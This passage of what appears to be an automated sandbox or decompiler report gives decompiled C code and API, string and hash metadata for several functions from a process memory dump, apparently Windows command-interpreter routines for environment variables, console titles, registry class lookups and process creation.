                                                      						E4A736D44(_t86);
                                                      						_t86 = 0x2377;
                                                      					}
                                                      				}
                                                      				_t72 = E4A73B210(_t90, _t104, _t100,  &_v1172);
                                                      				_t102 = 1;
                                                      				if(_t72 != 1) {
                                                      					if((_v1172 & 0x00000040) != 0) {
                                                      						_v1172 = _v1172 & 0xfffb79fb;
                                                      					}
                                                      					if((_v1172 & 0x00000400) != 0) {
                                                      						_v1172 = _v1172 & 0xfffffdbb;
                                                      					}
                                                      					E4A732C56(0, _t90, 0x106,  &_v532, 0x106, 0);
                                                      					_t109 = _v1100;
                                                      					if(_v1100 == 0) {
                                                      						_v1100 = _t102;
                                                      						_v1096 = E4A7345D8( &_v532);
                                                      						_v1088 = 1;
                                                      						_v1092 = 0;
                                                      						_v1084 = 0;
                                                      					}
                                                      					_t102 = E4A73ADF8(0, _t86, _t90, _t109,  &_v1172);
                                                      					E4A73185A(0x4a755260, 0x104,  &_v532);
                                                      					E4A731911(_v1060);
                                                      				}
                                                      				return E4A7313A9(_t102, 0, _v8 ^ _t103, _t90, 0x106, _t102);
                                                      			}

                                                      APIs
                                                      • GetEnvironmentVariableW.KERNEL32(DIRCMD,?,00000106), ref: 4A73B002
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: EnvironmentVariable
                                                      • String ID: @$DIRCMD
                                                      • API String ID: 1431749950-2446930488
                                                      • Opcode ID: 64d0333ed9b835500c7ccb8a2e923f24272b63c319d0d183c5b6a72b40894862
                                                      • Instruction ID: ec64d3b2a5952722a65da6b2342c882986ec87b2c298e08718ff9bd11ef16fd9
                                                      • Opcode Fuzzy Hash: 64d0333ed9b835500c7ccb8a2e923f24272b63c319d0d183c5b6a72b40894862
                                                      • Instruction Fuzzy Hash: 0C51F2F68146689ADB71CF64CC847DEB7B8AF58204F4245EAD30CA7112E7305B88CF5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A7324ED(void* __eax, void* __ecx, intOrPtr* _a4) {
                                                      				WCHAR* _v8;
                                                      				void* __esi;
                                                      				void* _t15;
                                                      				long _t16;
                                                      				signed int _t19;
                                                      				WCHAR* _t24;
                                                      				intOrPtr* _t30;
                                                      				short _t34;
                                                      				intOrPtr _t35;
                                                      				signed int _t36;
                                                      				short* _t38;
                                                      				WCHAR* _t40;
                                                      				WCHAR* _t42;
                                                      				void* _t44;
                                                      
                                                      				_t15 = __eax;
                                                      				if(_a4 != 0 &&  *0x4a7540b4 == 0 &&  *0x4a7540e4 == 0) {
                                                      					_t16 = E4A731896(0x20c);
                                                      					_t40 = _t16;
                                                      					_v8 = _t40;
                                                      					if(_t40 == 0) {
                                                      						L15:
                                                      						return _t16;
                                                      					}
                                                      					_t16 = GetConsoleTitleW(_t40, 0x104);
                                                      					if(_t16 == 0) {
                                                      						goto L15;
                                                      					}
                                                      					_t30 = _a4;
                                                      					_t4 = _t30 + 2; // 0x2
                                                      					_t44 = _t4;
                                                      					do {
                                                      						_t35 =  *_t30;
                                                      						_t30 = _t30 + 2;
                                                      					} while (_t35 != 0);
                                                      					_t36 =  *0x4a754158; // 0x0
                                                      					_t6 = _t16 + 0xa; // 0xa
                                                      					_t45 = _t36 + (_t30 - _t44 >> 1) + _t6;
                                                      					_t42 = E4A732536(_t40, _t36 + (_t30 - _t44 >> 1) + _t6 + _t36 + (_t30 - _t44 >> 1) + _t6);
                                                      					if(_t42 == 0) {
                                                      						L14:
                                                      						_t16 = E4A73142E(_v8);
                                                      						goto L15;
                                                      					}
                                                      					_v8 = _t42;
                                                      					if( *0x4a754083 != 0) {
                                                      						_t19 =  *0x4a754158; // 0x0
                                                      						E4A73185A( &(_t42[_t19]), _t45 - _t19, _a4);
                                                      						L13:
                                                      						SetConsoleTitleW(_t42);
                                                      						goto L14;
                                                      					}
                                                      					E4A7320A9(_t45, _t42, _t45, " - ");
                                                      					_t24 = _t42;
                                                      					_t9 =  &(_t24[1]); // 0x2
                                                      					_t38 = _t9;
                                                      					do {
                                                      						_t34 =  *_t24;
                                                      						_t24 =  &(_t24[1]);
                                                      					} while (_t34 != 0);
                                                      					 *0x4a754158 = _t24 - _t38 >> 1;
                                                      					E4A7320A9(_t45, _t42, _t45, _a4);
                                                      					 *0x4a754083 = 1;
                                                      					goto L13;
                                                      				}
                                                      				return _t15;
                                                      			}

                                                      APIs
                                                      • GetConsoleTitleW.KERNEL32 ref: 4A7374C4
                                                      • SetConsoleTitleW.KERNEL32(00000000), ref: 4A737549
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ConsoleTitle
                                                      • String ID: -
                                                      • API String ID: 3358957663-3695764949
                                                      • Opcode ID: 64678a9f9aca070c31e8b168baf7e5d5be40e6419a0e34685088b84478790d20
                                                      • Instruction ID: 182995d01a6fce75770d688e3429a4276a8ddac653e13b2c51f427cb9b5f3a5f
                                                      • Opcode Fuzzy Hash: 64678a9f9aca070c31e8b168baf7e5d5be40e6419a0e34685088b84478790d20
                                                      • Instruction Fuzzy Hash: 3D213BF250A915FAD771CB58C809AEA3FBDEBC2344F134068E505DB542EB31DA49D790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E4A74D40E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				long _t19;
                                                      				intOrPtr* _t22;
                                                      				intOrPtr _t30;
                                                      				long _t33;
                                                      				signed int _t35;
                                                      				void* _t36;
                                                      				signed int _t37;
                                                      				void* _t45;
                                                      
                                                      				_t36 = __ecx;
                                                      				_push(0x18);
                                                      				_push(0x4a74d518);
                                                      				E4A73264A(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t45 - 0x28)) = 0;
                                                      				 *((intOrPtr*)(_t45 - 0x24)) = 0;
                                                      				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t45 - 0x1c);
                                                      				 *(_t45 - 0x20) = _t19;
                                                      				if(_t19 == 0) {
                                                      					_t22 = E4A7322CA( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + 0x3c)), 0x4a74bd20, 3);
                                                      					_t43 = _t22;
                                                      					 *((intOrPtr*)(_t45 - 4)) = 0;
                                                      					if( *_t22 != 0) {
                                                      						_t35 = E4A7319D6(E4A732598(_t36, _t43));
                                                      						 *((intOrPtr*)(_t45 - 0x28)) = _t35;
                                                      						__eflags = _t35;
                                                      						if(_t35 != 0) {
                                                      							_t37 =  *(E4A73413B(_t43)) & 0x0000ffff;
                                                      							__eflags = _t37;
                                                      							if(_t37 != 0) {
                                                      								__eflags = _t37 - 0x3d;
                                                      								if(_t37 == 0x3d) {
                                                      									_t44 = E4A73413B(_t27);
                                                      									_t30 = E4A7319D6(E4A732598(_t37, _t28));
                                                      									 *((intOrPtr*)(_t45 - 0x24)) = _t30;
                                                      									__eflags = _t30;
                                                      									if(_t30 != 0) {
                                                      										__eflags =  *((intOrPtr*)(E4A73413B(_t44)));
                                                      										if(__eflags != 0) {
                                                      											goto L8;
                                                      										} else {
                                                      											_t33 = E4A74D26F(_t35, 0, _t44, __eflags,  *(_t45 - 0x1c), _t35,  *((intOrPtr*)(_t45 - 0x24)));
                                                      											goto L12;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									L8:
                                                      									_push(0);
                                                      									_push(0x232a);
                                                      									E4A736D44(_t37);
                                                      								}
                                                      							} else {
                                                      								_push(_t35);
                                                      								goto L3;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_push(0);
                                                      						L3:
                                                      						_push( *(_t45 - 0x1c));
                                                      						_t33 = E4A74D0F9();
                                                      						L12:
                                                      						 *(_t45 - 0x20) = _t33;
                                                      					}
                                                      					 *((intOrPtr*)(_t45 - 4)) = 0xfffffffe;
                                                      					E4A74D503();
                                                      					RegCloseKey( *(_t45 - 0x1c));
                                                      					_t19 =  *(_t45 - 0x20);
                                                      				}
                                                      				return E4A7313B6(_t19);
                                                      			}

                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32 ref: 4A74D436
                                                        • Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B
                                                      • RegCloseKey.KERNEL32(?), ref: 4A74D4ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CloseOpeniswspace
                                                      • String ID: Software\Classes
                                                      • API String ID: 1054702887-1656466771
                                                      • Opcode ID: 73163313c69f62d7804425893f5cd3fc57abedc7fe8d615cdfd9f912c989159c
                                                      • Instruction ID: a929f2296b0e2f67e81fec823011e28808469ae32b672c0785740061a5318225
                                                      • Opcode Fuzzy Hash: 73163313c69f62d7804425893f5cd3fc57abedc7fe8d615cdfd9f912c989159c
                                                      • Instruction Fuzzy Hash: 742125B0849A19BADFB1ABE4CC58DDF7EB9EF58240F22C055E580BF053D6380A08C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E4A74DDAB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				long _t19;
                                                      				intOrPtr* _t22;
                                                      				intOrPtr _t29;
                                                      				long _t32;
                                                      				intOrPtr* _t34;
                                                      				void* _t35;
                                                      				signed int _t36;
                                                      				void* _t44;
                                                      
                                                      				_t35 = __ecx;
                                                      				_push(0x18);
                                                      				_push(0x4a74deb0);
                                                      				E4A73264A(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t44 - 0x28)) = 0;
                                                      				 *((intOrPtr*)(_t44 - 0x24)) = 0;
                                                      				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t44 - 0x1c);
                                                      				 *(_t44 - 0x20) = _t19;
                                                      				if(_t19 == 0) {
                                                      					_t22 = E4A7322CA( *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + 0x3c)), 0x4a74bd20, 3);
                                                      					_t42 = _t22;
                                                      					 *((intOrPtr*)(_t44 - 4)) = 0;
                                                      					if( *_t22 != 0) {
                                                      						_t34 = E4A7319D6(E4A732598(_t35, _t42));
                                                      						 *((intOrPtr*)(_t44 - 0x28)) = _t34;
                                                      						if(_t34 != 0) {
                                                      							_t36 =  *(E4A73413B(_t42)) & 0x0000ffff;
                                                      							if(_t36 != 0) {
                                                      								if(_t36 == 0x3d) {
                                                      									_t43 = E4A73413B(_t27);
                                                      									_t29 = E4A7319D6(_t28);
                                                      									 *((intOrPtr*)(_t44 - 0x24)) = _t29;
                                                      									if(_t29 != 0) {
                                                      										if( *((intOrPtr*)(E4A73413B(_t43))) != 0) {
                                                      											goto L8;
                                                      										} else {
                                                      											_t32 = E4A74DB5E( *(_t44 - 0x1c), _t34,  *((intOrPtr*)(_t44 - 0x24)));
                                                      											goto L12;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									L8:
                                                      									_push(0);
                                                      									_push(0x232a);
                                                      									E4A736D44(_t36);
                                                      								}
                                                      							} else {
                                                      								_push(_t34);
                                                      								goto L3;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_push(0);
                                                      						L3:
                                                      						_push( *(_t44 - 0x1c));
                                                      						_t32 = E4A74D88B();
                                                      						L12:
                                                      						 *(_t44 - 0x20) = _t32;
                                                      					}
                                                      					 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
                                                      					E4A74DE9A();
                                                      					RegCloseKey( *(_t44 - 0x1c));
                                                      					_t19 =  *(_t44 - 0x20);
                                                      				}
                                                      				return E4A7313B6(_t19);
                                                      			}












                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32 ref: 4A74DDD3
                                                        • Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B
                                                      • RegCloseKey.KERNEL32(?), ref: 4A74DE84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CloseOpeniswspace
                                                      • String ID: Software\Classes
                                                      • API String ID: 1054702887-1656466771
                                                      • Opcode ID: d14bc6cceeb345e3d86a5c5d2e2811aa536ec063ca21b7f2e78967c6795c8ee8
                                                      • Instruction ID: fc5880da88fac73f1fead2f1c96f4d1b27a4c4820436fa921665f8e3d5b2a3ed
                                                      • Opcode Fuzzy Hash: d14bc6cceeb345e3d86a5c5d2e2811aa536ec063ca21b7f2e78967c6795c8ee8
                                                      • Instruction Fuzzy Hash: B721C2B1849A29BADB729FA0CC4C9EF7AB8EF65350F128055E181BE053E7710D48C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 52%
                                                      			E4A73684E(int __ebx, signed int __ecx, signed int __edx, signed int _a4) {
                                                      				signed int _v8;
                                                      				intOrPtr _v20;
                                                      				signed int _v32;
                                                      				short _v33856;
                                                      				char _v66624;
                                                      				char _v83008;
                                                      				char _v99392;
                                                      				char _v115776;
                                                      				signed int _v115788;
                                                      				long _v115800;
                                                      				intOrPtr _v115801;
                                                      				signed int _v115808;
                                                      				char _v115813;
                                                      				signed int _v115820;
                                                      				signed int _v115824;
                                                      				int _v115828;
                                                      				signed int _v115832;
                                                      				WCHAR* _v115840;
                                                      				WCHAR* _v115844;
                                                      				intOrPtr _v115848;
                                                      				long _v115852;
                                                      				intOrPtr _v115856;
                                                      				void* _v115860;
                                                      				struct _PROCESS_INFORMATION _v115876;
                                                      				long _v115880;
                                                      				int _v115892;
                                                      				void* _v115896;
                                                      				struct _STARTUPINFOW _v115964;
                                                      				void* _v115972;
                                                      				long _v115996;
                                                      				signed int _v116000;
                                                      				WCHAR* _v116004;
                                                      				char* _v116008;
                                                      				WCHAR* _v116012;
                                                      				void* _v116020;
                                                      				intOrPtr _v116024;
                                                      				void _v116028;
                                                      				struct _STARTUPINFOW _v116096;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t114;
                                                      				long _t121;
                                                      				void* _t123;
                                                      				int _t129;
                                                      				long _t130;
                                                      				signed int _t131;
                                                      				signed int _t140;
                                                      				long _t142;
                                                      				signed int _t147;
                                                      				signed int _t149;
                                                      				long* _t150;
                                                      				long _t151;
                                                      				long _t152;
                                                      				long* _t155;
                                                      				int* _t159;
                                                      				signed int* _t162;
                                                      				long _t166;
                                                      				signed int _t181;
                                                      				intOrPtr* _t190;
                                                      				signed int _t192;
                                                      				intOrPtr* _t194;
                                                      				int _t209;
                                                      				intOrPtr _t210;
                                                      				intOrPtr _t219;
                                                      				signed int _t220;
                                                      				void* _t221;
                                                      				intOrPtr* _t223;
                                                      				intOrPtr _t224;
                                                      				void* _t227;
                                                      				void* _t228;
                                                      				WCHAR* _t229;
                                                      				void* _t230;
                                                      				int _t233;
                                                      				intOrPtr _t234;
                                                      				long _t235;
                                                      				signed int _t239;
                                                      				void* _t240;
                                                      
                                                      				_t220 = __edx;
                                                      				_t211 = __ecx;
                                                      				_t209 = __ebx;
                                                      				_push(__ecx);
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_t223 = _a4;
                                                      				_t233 =  *(_t223 + 0x3c);
                                                      				if(_t233 == 0) {
                                                      					L14:
                                                      					if( *_t223 != 0x14) {
                                                      						goto L61;
                                                      					} else {
                                                      						goto L15;
                                                      					}
                                                      				} else {
                                                      					while(1) {
                                                      						_t114 =  *_t233 & 0x0000ffff;
                                                      						if(_t114 == 0 || _t114 > 0x20) {
                                                      							break;
                                                      						}
                                                      						_t233 = _t233 + 2;
                                                      						if(_t233 != 0) {
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					if(_t233 == 0) {
                                                      						goto L14;
                                                      					} else {
                                                      						__imp___wcsnicmp(_t233, E4A736908, 2);
                                                      						_t240 = _t240 + 0xc;
                                                      						if(_t114 != 0) {
                                                      							L10:
                                                      							if(_t233 != 0) {
                                                      								_t114 = swscanf(_t233, E4A735104,  &_a4);
                                                      								_t240 = _t240 + 0xc;
                                                      								if(_t114 == 1) {
                                                      									_t114 = _a4;
                                                      									 *0x4a754188 = _t114;
                                                      									if( *0x4a7540e4 != 0) {
                                                      										_v8 = _t114;
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L14;
                                                      						} else {
                                                      							_t233 = _t233 + 4;
                                                      							 *_t223 = 0x14;
                                                      							 *(_t223 + 0x3c) = L":EOF";
                                                      							if(_t233 == 0) {
                                                      								L15:
                                                      								if( *0x4a7540b4 == 0) {
                                                      									L61:
                                                      									E4A7315D2(_t114,  *0x4a7541a8);
                                                      									_push( *0x4a754188);
                                                      									E4A7372E9(_t211, _t223, _t233, __eflags);
                                                      									asm("int3");
                                                      									_v115813 = 1;
                                                      									__eflags = _v115801 - _t209;
                                                      									if(_v115801 != _t209) {
                                                      										L23:
                                                      										__eflags = _v115848 - _t209;
                                                      										if(_v115848 != _t209) {
                                                      											SetConsoleCtrlHandler(_t209, 1);
                                                      										}
                                                      										_v116096.cb = 0x44;
                                                      										GetStartupInfoW( &_v116096);
                                                      										_v115964.lpDesktop = _v116096.lpDesktop;
                                                      										__eflags = _v115801 - _t209;
                                                      										if(_v115801 != _t209) {
                                                      											_v115828 = _t209;
                                                      											goto L32;
                                                      										} else {
                                                      											_v115852 = _t209;
                                                      											_t150 =  &_v115852;
                                                      											__imp__InitializeProcThreadAttributeList(_t209, 2, _t209, _t150);
                                                      											__eflags = _t150 - _t209;
                                                      											if(_t150 != _t209) {
                                                      												 *0x4a754128 = 0x54f;
                                                      												goto L48;
                                                      											} else {
                                                      												_t233 = GetLastError;
                                                      												_t151 = GetLastError();
                                                      												__eflags = _t151 - 0x7a;
                                                      												if(_t151 != 0x7a) {
                                                      													_t152 = GetLastError();
                                                      													goto L77;
                                                      												} else {
                                                      													_t233 = GetProcessHeap;
                                                      													_t227 = HeapAlloc(GetProcessHeap(), 8, _v115852);
                                                      													__eflags = _t227 - _t209;
                                                      													if(_t227 == _t209) {
                                                      														_t152 = GetLastError();
                                                      														L77:
                                                      														 *0x4a754128 = _t152;
                                                      														goto L48;
                                                      													} else {
                                                      														_t155 =  &_v115852;
                                                      														__imp__InitializeProcThreadAttributeList(_t227, 2, _t209, _t155);
                                                      														__eflags = _t155 - _t209;
                                                      														if(_t155 == _t209) {
                                                      															 *0x4a754128 = GetLastError();
                                                      															goto L80;
                                                      														} else {
                                                      															_v115892 = 1;
                                                      															_t159 =  &_v115892;
                                                      															__imp__UpdateProcThreadAttribute(_t227, _t209, 0x60001, _t159, 4, _t209, _t209);
                                                      															__eflags = _t159 - _t209;
                                                      															if(_t159 == _t209) {
                                                      																L81:
                                                      																 *0x4a754128 = GetLastError();
                                                      																__imp__DeleteProcThreadAttributeList(_t227);
                                                      																L80:
                                                      																HeapFree(GetProcessHeap(), _t209, _t227);
                                                      																goto L48;
                                                      															} else {
                                                      																_v115896 = _t227;
                                                      																__eflags = _v115832 - 0xffff;
                                                      																if(_v115832 != 0xffff) {
                                                      																	_v115824 = _v115832 & 0x0000ffff;
                                                      																	_t162 =  &_v115824;
                                                      																	__imp__UpdateProcThreadAttribute(_t227, _t209, 0x20004, _t162, 2, _t209, _t209);
                                                      																	__eflags = _t162 - _t209;
                                                      																	if(_t162 != _t209) {
                                                      																		goto L31;
                                                      																	} else {
                                                      																		goto L81;
                                                      																	}
                                                      																} else {
                                                      																	L31:
                                                      																	_t166 = _v115808 | 0x00000400;
                                                      																	__eflags = _t166;
                                                      																	_v115828 = CreateProcessW( &_v33856, _v115844, _t209, _t209, 1, _t166, _v115860, _v115840,  &_v115964,  &_v115876);
                                                      																	__imp__DeleteProcThreadAttributeList(_t227);
                                                      																	HeapFree(GetProcessHeap(), _t209, _t227);
                                                      																	L32:
                                                      																	__eflags = _v115848 - _t209;
                                                      																	if(_v115848 != _t209) {
                                                      																		SetConsoleCtrlHandler(_t209, _t209);
                                                      																	}
                                                      																	_t121 = GetLastError();
                                                      																	 *0x4a754128 = _t121;
                                                      																	__eflags = _v115828 - _t209;
                                                      																	if(_v115828 == _t209) {
                                                      																		__eflags = _v115801 - _t209;
                                                      																		if(_v115801 == _t209) {
                                                      																			__eflags =  *0x4a754081 - _t209; // 0x0
                                                      																			if(__eflags == 0) {
                                                      																				L53:
                                                      																				__eflags = _t121 - 0x2e4;
                                                      																				if(_t121 == 0x2e4) {
                                                      																					goto L42;
                                                      																				} else {
                                                      																				}
                                                      																			} else {
                                                      																				__eflags = _t121 - 0xc1;
                                                      																				if(_t121 == 0xc1) {
                                                      																					goto L42;
                                                      																				} else {
                                                      																					goto L53;
                                                      																				}
                                                      																			}
                                                      																		} else {
                                                      																			L42:
                                                      																			_t233 = 0x3c;
                                                      																			_t123 = memset( &_v116028, _t209, _t233);
                                                      																			_v116028 = _t233;
                                                      																			_v116024 = 0x8140;
                                                      																			__eflags = _v115808 & 0x00000010;
                                                      																			if((_v115808 & 0x00000010) != 0) {
                                                      																				_v116024 = 0x140;
                                                      																			}
                                                      																			__imp__GetConsoleWindow();
                                                      																			_v116020 = _t123;
                                                      																			_v116012 =  &_v33856;
                                                      																			_v116008 =  &_v83008;
                                                      																			_v116004 = _v115840;
                                                      																			_v116000 = _v115964.wShowWindow & 0x0000ffff;
                                                      																			_v8 = _t209;
                                                      																			_t129 =  *0x4a75403c( &_v116028);
                                                      																			_v115828 = _t129;
                                                      																			__eflags = _t129 - _t209;
                                                      																			if(_t129 == _t209) {
                                                      																				_t130 = _v115996;
                                                      																				__eflags = _t130 - _t209;
                                                      																				if(_t130 == _t209) {
                                                      																					 *0x4a754128 = 8;
                                                      																				} else {
                                                      																					__eflags = _t130 - 0x20;
                                                      																					if(_t130 == 0x20) {
                                                      																						 *0x4a754128 = 2;
                                                      																					} else {
                                                      																						 *0x4a754128 = _t130;
                                                      																					}
                                                      																				}
                                                      																			} else {
                                                      																				_v115876.hProcess = _v115972;
                                                      																			}
                                                      																			_v8 = 0xfffffffe;
                                                      																		}
                                                      																		__eflags = _v115828 - _t209;
                                                      																		if(_v115828 != _t209) {
                                                      																			goto L36;
                                                      																		} else {
                                                      																			L48:
                                                      																			E4A74065B(_t233,  &_v33856);
                                                      																			goto L49;
                                                      																		}
                                                      																	} else {
                                                      																		__eflags = _v115820 - _t209;
                                                      																		if(_v115820 != _t209) {
                                                      																			asm("stosd");
                                                      																			asm("stosd");
                                                      																			asm("stosd");
                                                      																			_t140 =  &_v115800;
                                                      																			__imp__GetThreadGroupAffinity(_v115876.hThread, _t140);
                                                      																			__eflags = _t140;
                                                      																			_t235 = _v115800;
                                                      																			if(_t140 == 0) {
                                                      																				_t235 = _v115880;
                                                      																			}
                                                      																			__eflags = _v115832 - 0xffff;
                                                      																			if(_v115832 != 0xffff) {
                                                      																				asm("stosd");
                                                      																				asm("stosd");
                                                      																				asm("stosd");
                                                      																				_t147 =  &_v115788;
                                                      																				__imp__GetNumaNodeProcessorMaskEx(_v115832, _t147);
                                                      																				__eflags = _t147;
                                                      																				if(_t147 == 0) {
                                                      																					L90:
                                                      																					_v115820 = _t209;
                                                      																				} else {
                                                      																					_t149 = _v115788 & _t235;
                                                      																					__eflags = _t149;
                                                      																					if(_t149 == 0) {
                                                      																						goto L90;
                                                      																					} else {
                                                      																						_t235 = _t149;
                                                      																						__imp__RtlFindLeastSignificantBit(_v115788, _t209);
                                                      																						_t211 = _t149;
                                                      																						_v115820 = _v115820 << _t149;
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																			_t142 = _v115820 & _t235;
                                                      																			__eflags = _t142;
                                                      																			if(_t142 != 0) {
                                                      																				_t235 = _t142;
                                                      																			}
                                                      																			SetProcessAffinityMask(_v115876.hProcess, _t235);
                                                      																		}
                                                      																		ResumeThread(_v115876.hThread);
                                                      																		CloseHandle(_v115876.hThread);
                                                      																		L36:
                                                      																		__eflags = _v115876.hProcess - _t209;
                                                      																		if(_v115876.hProcess != _t209) {
                                                      																			_push(_v115876);
                                                      																			__eflags = _v115856 - _t209;
                                                      																			if(_v115856 != _t209) {
                                                      																				 *0x4a754188 = E4A733BE0(_t211);
                                                      																			} else {
                                                      																				CloseHandle();
                                                      																			}
                                                      																		}
                                                      																		_t131 = 0;
                                                      																		__eflags = 0;
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										__eflags = _v115813 - _t209;
                                                      										if(_v115813 != _t209) {
                                                      											_t228 = E4A732070(L"COMSPEC");
                                                      											__eflags = _t228 - _t209;
                                                      											if(_t228 == _t209) {
                                                      												_push(_t209);
                                                      												_push(0x400023d2);
                                                      												E4A736D44(_t211);
                                                      												L49:
                                                      												_t131 = 1;
                                                      											} else {
                                                      												E4A73179D( &_v115776, _t233, L" /K %s",  &_v99392);
                                                      												_t240 = _t240 + 0x10;
                                                      												E4A73185A( &_v33856, _t233, _t228);
                                                      												E4A73185A( &_v99392, _t233,  &_v33856);
                                                      												_t181 =  &_v115776;
                                                      												__imp___wcsicmp(L" /K ");
                                                      												_t211 = _t181;
                                                      												__eflags = _t181;
                                                      												if(_t181 != 0) {
                                                      													__eflags = _v83008 - _t209;
                                                      													if(_v83008 != _t209) {
                                                      														_t190 =  &_v83008;
                                                      														_t221 = _t190 + 2;
                                                      														do {
                                                      															_t219 =  *_t190;
                                                      															_t190 = _t190 + 2;
                                                      															__eflags = _t219 - _t209;
                                                      														} while (_t219 != _t209);
                                                      														_t192 = _t190 - _t221;
                                                      														__eflags = _t192;
                                                      														_t220 = _t192 >> 1;
                                                      														_t194 =  &_v115776;
                                                      														_t230 = _t194 + 2;
                                                      														do {
                                                      															_t211 =  *_t194;
                                                      															_t194 = _t194 + 2;
                                                      															__eflags = _t211 - _t209;
                                                      														} while (_t211 != _t209);
                                                      														__eflags = (_t194 - _t230 >> 1) + _t220 - _t233;
                                                      														if((_t194 - _t230 >> 1) + _t220 >= _t233) {
                                                      															E4A736D44(_t211, 0x2363, 1,  &_v83008);
                                                      															_t240 = _t240 + 0xc;
                                                      														} else {
                                                      															E4A7320A9(_t233,  &_v115776, _t233, E4A7325B8);
                                                      															E4A7320A9(_t233,  &_v115776, _t233,  &_v83008);
                                                      														}
                                                      													}
                                                      												}
                                                      												_t229 =  &_v115776;
                                                      												goto L20;
                                                      											}
                                                      										} else {
                                                      											_t229 = _v115844;
                                                      											L20:
                                                      											E4A73185A( &_v66624, _t233,  &_v99392);
                                                      											E4A7320A9(_t233,  &_v66624, _t233, E4A7325B8);
                                                      											__eflags = _t229 - _t209;
                                                      											if(_t229 != _t209) {
                                                      												E4A7320A9(_t233,  &_v66624, _t233, _t229);
                                                      											}
                                                      											_v115844 =  &_v66624;
                                                      											goto L23;
                                                      										}
                                                      									}
                                                      									 *[fs:0x0] = _v20;
                                                      									_pop(_t224);
                                                      									_pop(_t234);
                                                      									_pop(_t210);
                                                      									__eflags = _v32 ^ _t239;
                                                      									return E4A7313A9(_t131, _t210, _v32 ^ _t239, _t220, _t224, _t234);
                                                      								} else {
                                                      									E4A736447(_t220, _t223);
                                                      									return _v8;
                                                      								}
                                                      							} else {
                                                      								while(1) {
                                                      									_t114 =  *_t233 & 0x0000ffff;
                                                      									if(_t114 == 0 || _t114 > 0x20) {
                                                      										goto L10;
                                                      									}
                                                      									_t233 = _t233 + 2;
                                                      									if(_t233 != 0) {
                                                      										continue;
                                                      									}
                                                      									goto L10;
                                                      								}
                                                      								goto L10;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}
















































































                                                      0x4a7391a5
                                                      0x4a7391b0
                                                      0x00000000
                                                      0x4a7391b0
                                                      0x4a739166
                                                      0x4a73935c
                                                      0x4a739364
                                                      0x4a739365
                                                      0x4a739366
                                                      0x4a73936a
                                                      0x4a739372
                                                      0x4a7368f9
                                                      0x4a7368fa
                                                      0x4a736905
                                                      0x4a736905
                                                      0x4a7368a1
                                                      0x4a7368a1
                                                      0x4a7368a1
                                                      0x4a7368a7
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7368b0
                                                      0x4a7368b1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7368b1
                                                      0x00000000
                                                      0x4a7368a1
                                                      0x4a73689f
                                                      0x4a73688d
                                                      0x4a736878

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsnicmpswscanf
                                                      • String ID: :EOF
                                                      • API String ID: 1534968528-551370653
                                                      • Opcode ID: b6879a8d5ff019c8d9dd6f1c3bd1a631b9915b8215cea018774e28bfa34debaf
                                                      • Instruction ID: d7e22936c1308214fb2ed01a8a8c084a1c9bd1eeb1e59dc5138186aee96442cc
                                                      • Opcode Fuzzy Hash: b6879a8d5ff019c8d9dd6f1c3bd1a631b9915b8215cea018774e28bfa34debaf
                                                      • Instruction Fuzzy Hash: 9F212675949A20ABEBB09B00C9447EB3F78EF05751F134015EC41A7903C7B8CE59D796
                                                      Uniqueness

